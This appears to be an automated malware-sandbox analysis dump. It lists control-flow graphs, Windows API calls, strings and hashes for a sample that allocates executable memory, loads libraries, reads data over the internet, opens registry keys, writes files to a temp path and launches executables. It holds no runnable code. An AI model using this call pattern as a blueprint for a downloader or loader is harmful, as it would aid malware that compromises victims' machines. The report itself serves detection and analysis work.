                                          control_flow_graph 2458 4b4003c-4b40047 2459 4b4004c-4b40263 call 4b40a3f call 4b40e0f call 4b40d90 VirtualAlloc 2458->2459 2460 4b40049 2458->2460 2475 4b40265-4b40289 call 4b40a69 2459->2475 2476 4b4028b-4b40292 2459->2476 2460->2459 2480 4b402ce-4b403c2 VirtualProtect call 4b40cce call 4b40ce7 2475->2480 2478 4b402a1-4b402b0 2476->2478 2479 4b402b2-4b402cc 2478->2479 2478->2480 2479->2478 2487 4b403d1-4b403e0 2480->2487 2488 4b403e2-4b40437 call 4b40ce7 2487->2488 2489 4b40439-4b404b8 VirtualFree 2487->2489 2488->2487 2491 4b405f4-4b405fe 2489->2491 2492 4b404be-4b404cd 2489->2492 2493 4b40604-4b4060d 2491->2493 2494 4b4077f-4b40789 2491->2494 2496 4b404d3-4b404dd 2492->2496 2493->2494 2497 4b40613-4b40637 2493->2497 2499 4b407a6-4b407b0 2494->2499 2500 4b4078b-4b407a3 2494->2500 2496->2491 2501 4b404e3-4b40505 LoadLibraryA 2496->2501 2506 4b4063e-4b40648 2497->2506 2502 4b407b6-4b407cb 2499->2502 2503 4b4086e-4b408be LoadLibraryA 2499->2503 2500->2499 2504 4b40517-4b40520 2501->2504 2505 4b40507-4b40515 2501->2505 2507 4b407d2-4b407d5 2502->2507 2514 4b408c7-4b408f9 2503->2514 2508 4b40526-4b40547 2504->2508 2505->2508 2506->2494 2509 4b4064e-4b4065a 2506->2509 2510 4b40824-4b40833 2507->2510 2511 4b407d7-4b407e0 2507->2511 2512 4b4054d-4b40550 2508->2512 2509->2494 2513 4b40660-4b4066a 2509->2513 2520 4b40839-4b4083c 2510->2520 2515 4b407e4-4b40822 2511->2515 2516 4b407e2 2511->2516 2517 4b40556-4b4056b 2512->2517 2518 4b405e0-4b405ef 2512->2518 2519 4b4067a-4b40689 2513->2519 2521 4b40902-4b4091d 2514->2521 2522 4b408fb-4b40901 2514->2522 2515->2507 2516->2510 2523 4b4056d 2517->2523 2524 4b4056f-4b4057a 2517->2524 2518->2496 2525 4b40750-4b4077a 2519->2525 2526 4b4068f-4b406b2 2519->2526 2520->2503 2527 4b4083e-4b40847 2520->2527 2522->2521 2523->2518 2529 4b4057c-4b40599 2524->2529 2530 4b4059b-4b405bb 2524->2530 2525->2506 2531 4b406b4-4b406ed 2526->2531 2532 4b406ef-4b406fc 2526->2532 2533 4b40849 2527->2533 2534 4b4084b-4b4086c 2527->2534 2541 4b405bd-4b405db 2529->2541 2530->2541 2531->2532 2535 4b406fe-4b40748 2532->2535 2536 4b4074b 2532->2536 2533->2503 2534->2520 2535->2536 2536->2519 2541->2512
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B4024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: aaf139267ef4e5642fbb18c39f388347c894ce93ea4240f5c082b251081cc81f
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: EB527974A01229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB351DB30AA85DF15

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2542 10001175-100011a6 call 1000e8e7 2545 100011a8-100011bd call 1000270d 2542->2545 2546 100011bf 2542->2546 2548 100011c5-100011dd InternetSetFilePointer 2545->2548 2546->2548 2550 100011e3-1000121b InternetReadFile 2548->2550 2551 10001253-1000125a 2550->2551 2552 1000121d-1000124d call 1000270d call 100050e0 call 10002724 2550->2552 2553 10001260-100012a0 call 10003c40 HttpQueryInfoA 2551->2553 2554 1000125c-1000125e 2551->2554 2552->2551 2561 100012a6-100012d2 CoCreateInstance 2553->2561 2562 1000150a-10001520 call 1000e8a5 2553->2562 2554->2550 2554->2553 2561->2562 2564 100012d8-100012df 2561->2564 2564->2562 2567 100012e5-10001316 call 1000184b call 10001006 2564->2567 2573 10001318 2567->2573 2574 1000131a-10001351 call 10001c08 call 10001bb9 2567->2574 2573->2574 2580 10001357-1000135e 2574->2580 2581 100014fe-10001505 2574->2581 2580->2581 2582 10001364-100013cc call 1000270d 2580->2582 2581->2562 2586 100013d2-100013e8 2582->2586 2587 100014e6-100014f9 call 10002724 2582->2587 2589 10001486-10001497 2586->2589 2590 100013ee-1000141d call 1000270d 2586->2590 2587->2581 2592 10001499-1000149b 2589->2592 2593 100014dc-100014e4 2589->2593 2598 1000146e-10001483 call 10002724 2590->2598 2599 1000141f-10001421 2590->2599 2596 100014aa-100014ac 2592->2596 2597 1000149d-100014a8 call 10005926 2592->2597 2593->2587 2601 100014c0-100014d1 call 10003c40 call 10005926 2596->2601 2602 100014ae-100014be call 100050e0 2596->2602 2613 100014d7 call 1000584c 2597->2613 2598->2589 2604 10001423-10001425 2599->2604 2605 10001434-10001447 call 10003c40 2599->2605 2601->2613 2602->2593 2604->2605 2610 10001427-10001432 call 100050e0 2604->2610 2621 10001456-1000145c 2605->2621 2622 10001449-10001454 call 10005926 2605->2622 2610->2598 2613->2593 2621->2598 2624 1000145e-10001463 call 10005926 2621->2624 2628 10001469 call 1000584c 2622->2628 2624->2628 2628->2598
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                          • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                          • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                          • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                          • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                          • String ID: text
                                          • API String ID: 1154000607-999008199
                                          • Opcode ID: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                          • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                          • Opcode Fuzzy Hash: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                          • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                          APIs
                                            • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,F6E2F767), ref: 004107F7
                                            • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                          • Sleep.KERNEL32(000005DC), ref: 00405A90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: SUB=$get$U%
                                          • API String ID: 2563648476-1840017472
                                          • Opcode ID: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                          • Instruction ID: c38411781881cdafda6c84006562c20812e5f10be50bcbbeaff71a156a434d29
                                          • Opcode Fuzzy Hash: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                          • Instruction Fuzzy Hash: 04323171D101089BCB19FBB5C95AADE73786F14308F50817FE856771C2EE7C6A08CAA9

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                            • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: .exe$open
                                          • API String ID: 1627157292-49952409
                                          • Opcode ID: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                          • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                          • Opcode Fuzzy Hash: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                          • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3520 401e20-401e6e 3521 401e70-401e75 3520->3521 3521->3521 3522 401e77-402149 call 402730 * 2 call 40afb0 call 40d0b0 InternetOpenA 3521->3522 3535 402173-402190 call 4099d7 3522->3535 3536 40214b-402157 3522->3536 3537 402169-402170 call 409b3c 3536->3537 3538 402159-402167 3536->3538 3537->3535 3538->3537 3540 402198-4021c9 call 40cfaf call 401e20 3538->3540
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: http://
                                          • API String ID: 0-1121587658
                                          • Opcode ID: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                          • Instruction ID: 09126ff878240097ddd60f0c8300d9112e53121ff3c2cf1df5c9ef382bee38eb
                                          • Opcode Fuzzy Hash: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                          • Instruction Fuzzy Hash: 1A518E71E002099FDF14CFA9C895BEEB7B9EB08304F10812EE915BB6C1C779A944CB94

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3549 9acf53-9b069b 3555 9b069d-9b06b8 RegOpenKeyA 3549->3555 3556 9b06c4-9b06df RegOpenKeyA 3549->3556 3555->3556 3559 9b06ba 3555->3559 3557 9b06e1-9b06eb 3556->3557 3558 9b06f7-9b0723 3556->3558 3557->3558 3562 9b0730-9b073a 3558->3562 3563 9b0725-9b072e GetNativeSystemInfo 3558->3563 3559->3556 3564 9b073c 3562->3564 3565 9b0746-9b0754 3562->3565 3563->3562 3564->3565 3567 9b0760-9b0767 3565->3567 3568 9b0756 3565->3568 3569 9b077a 3567->3569 3570 9b076d-9b0774 3567->3570 3568->3567 3572 9b08f9-9b09ee 3569->3572 3570->3569 3571 9ae9a4-9ae9ab 3570->3571 3573 9ad902-9b0b28 3571->3573 3574 9ae9b1-9afd3e 3571->3574 3574->3572
                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,-1B9C3049,-1B9C3307), ref: 009B06B0
                                          • RegOpenKeyA.ADVAPI32(80000002,-1B9C3526,-1B9C3307), ref: 009B06D7
                                          • GetNativeSystemInfo.KERNEL32(-1B9C3107), ref: 009B072E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9a9000_file.jbxd
                                          Similarity
                                          • API ID: Open$InfoNativeSystem
                                          • String ID:
                                          • API String ID: 1247124224-0
                                          • Opcode ID: 31fe50eed3729e0d47082589870a2a767d099cdfd883cc43b9975fa4bfe58430
                                          • Instruction ID: ad5e072bf01ef2511213a221520f7754ca2c10cdbf73d88da853898e23919244
                                          • Opcode Fuzzy Hash: 31fe50eed3729e0d47082589870a2a767d099cdfd883cc43b9975fa4bfe58430
                                          • Instruction Fuzzy Hash: 5251CD7610820ADFDB15DF14C944AEFBBE5EF45324F11082EE9C182950E77A4DA4DF8A

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3579 4021f0-40220b 3580 40226b-40227c call 4099d7 3579->3580 3581 40220d-402211 3579->3581 3581->3580 3582 402213-402231 CreateFileA 3581->3582 3582->3580 3584 402233-402260 WriteFile CloseHandle call 4099d7 3582->3584 3587 402265-402268 3584->3587
                                          APIs
                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                          • CloseHandle.KERNEL32(00000000), ref: 0040224E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleWrite
                                          • String ID:
                                          • API String ID: 1065093856-0
                                          • Opcode ID: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                          • Instruction ID: 5700bef43f604e24781938fdb315806f7bd82b17c931dadbe0ad0f8cbe635642
                                          • Opcode Fuzzy Hash: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                          • Instruction Fuzzy Hash: 2B01D272600208ABDB20DBA8DD49FAEB7E8EB48714F40417EFA05A62D0CBB46945C758

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3588 410536-410542 call 410567 3591 410554-410560 call 410580 ExitProcess 3588->3591 3592 410544-41054e GetCurrentProcess TerminateProcess 3588->3592 3592->3591
                                          APIs
                                          • GetCurrentProcess.KERNEL32(08758BC2,?,00410530,00000016,0040CDA2,?,08758BC2,F6E2F767,0040CDA2,08758BC2), ref: 00410547
                                          • TerminateProcess.KERNEL32(00000000,?,00410530,00000016,0040CDA2,?,08758BC2,F6E2F767,0040CDA2,08758BC2), ref: 0041054E
                                          • ExitProcess.KERNEL32 ref: 00410560
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                          • Instruction ID: 67797f44d9d46dd495823d9566bad27c4dc507fd550e6630b3786a266b8fea83
                                          • Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                          • Instruction Fuzzy Hash: A0D09E31000108FBCF11AF61DC0D8CD3F26AF40355B008035BD0945131DFB59DD69E48

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3608 4132b1-4132ba 3609 4132e9-4132ea 3608->3609 3610 4132bc-4132cf RtlFreeHeap 3608->3610 3610->3609 3611 4132d1-4132e8 GetLastError call 40d000 call 40d09d 3610->3611 3611->3609
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132C7
                                          • GetLastError.KERNEL32(00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 485612231-0
                                          • Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                          • Instruction ID: d8d9c1c0f29fd1ae3c391d4f931883298020c9469a54bb124b4f82b2896bf902
                                          • Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                          • Instruction Fuzzy Hash: E6E0E6356002146BCB113FB5AC097D57F68AB44759F114076F60C96161D6398996879C
                                          APIs
                                          • SetErrorMode.KERNEL32(00000400,?,?,04B40223,?,?), ref: 04B40E19
                                          • SetErrorMode.KERNEL32(00000000,?,?,04B40223,?,?), ref: 04B40E1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: f91484002589e88e4a4d3f6ea8ab43fed4857b487d85ba7f5556b63228273427
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: 0BD0123154512877D7003A94DC09BCD7B1CDF09B62F008451FB0DD9080C770964046E6
                                          APIs
                                          • VirtualProtect.KERNEL32(?), ref: 00AAA108
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_aa9000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: b3a8c6ed8dc826447d223531739a1b2fe0fd7c7af4461f27c0cf4ac263f778f4
                                          • Instruction ID: 15cb9c0051f1342dc9b0a95c6070f75e0cc2823682430babb103047e834ff598
                                          • Opcode Fuzzy Hash: b3a8c6ed8dc826447d223531739a1b2fe0fd7c7af4461f27c0cf4ac263f778f4
                                          • Instruction Fuzzy Hash: 62F0AF7610820BAFDB92EF54C5818EF77A1EF97330F204520E88567D51D3B66C21DB49
                                          APIs
                                          • VirtualProtect.KERNEL32(?), ref: 00AAA108
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_aa9000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 463ec44888b2a312c5a84106b6b023f516c383c0608f09db4fdf02e09e77ea33
                                          • Instruction ID: c0ecef5c983ea7c3247003e9f5ad9241e02dc68df0548c92d8c02007026bce5f
                                          • Opcode Fuzzy Hash: 463ec44888b2a312c5a84106b6b023f516c383c0608f09db4fdf02e09e77ea33
                                          • Instruction Fuzzy Hash: 7BF090B260820BAFDB52DF55C5414EE77A0EF97330F204425E881A7D52E3A26C21DB49
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                          • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                          • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                          • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                          • Instruction ID: d9d624181c4160d02ab49c773ca7be82655902724fa9057d6622eb650e71da69
                                          • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                          • Instruction Fuzzy Hash: BAE0E53350013057D6213F668C007DB7A4C9F413A2F180167EC18B62D0FA6CCE8141ED
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9a9000_file.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 35b1aa53981b310fde10dfa9d1d3f1f950c73e13cc2808e847c22abc41bd2f3e
                                          • Instruction ID: 5860003b203c7620d509779631a034d79d6dafb008438c2e2559339ddeed4f9c
                                          • Opcode Fuzzy Hash: 35b1aa53981b310fde10dfa9d1d3f1f950c73e13cc2808e847c22abc41bd2f3e
                                          • Instruction Fuzzy Hash: 89F0BCB240C241CFC3412F2AC55446AFBF8FF25711F160D1ED6C28A625E33549A19F93
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00CECE0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609959909.0000000000CEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEC000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_cec000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: b5fb26d6f1c4254bc8adde9ef39c6e5e3b6dfbcd4e03a20aefcf6b50d9273e94
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 71113C79A00248EFDB01DF99C985E99BBF5AF08350F058094F9489B362D375EA50EF80
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E3F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                          • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                          • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                          • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                          APIs
                                          • VirtualFree.KERNELBASE(?,?,?), ref: 00402E5C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                          • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                          • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                          • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84
                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04B43FF1
                                          • Sleep.KERNEL32(000003E8), ref: 04B44189
                                          • __Init_thread_footer.LIBCMT ref: 04B4475E
                                          • __Init_thread_footer.LIBCMT ref: 04B44924
                                          • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04B46D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B44B2E
                                          • __Init_thread_footer.LIBCMT ref: 04B44BBC
                                          • __Init_thread_footer.LIBCMT ref: 04B44E25
                                          • CoInitialize.OLE32(00000000), ref: 04B44EA6
                                          • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04B44EC1
                                          • __Init_thread_footer.LIBCMT ref: 04B45324
                                          • Sleep.KERNEL32(00000BB8,00000000,?,04B46CE8,0041D8A0,0042DB20,0042DB21), ref: 04B4553C
                                          • __Init_thread_footer.LIBCMT ref: 04B45632
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04B46D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B44F2F
                                            • Part of subcall function 04B50A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B45CE6,00000000,0042C014), ref: 04B50A5E
                                            • Part of subcall function 04B50A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B50A7D
                                          • __Init_thread_footer.LIBCMT ref: 04B4428D
                                            • Part of subcall function 04B49EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EAC
                                            • Part of subcall function 04B49EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49EDF
                                            • Part of subcall function 04B42457: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04B4248D
                                            • Part of subcall function 04B42457: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04B424AE
                                            • Part of subcall function 04B42457: CloseHandle.KERNEL32(00000000), ref: 04B424B5
                                          • __Init_thread_footer.LIBCMT ref: 04B44469
                                            • Part of subcall function 04B49EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EF7
                                            • Part of subcall function 04B49EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49F34
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
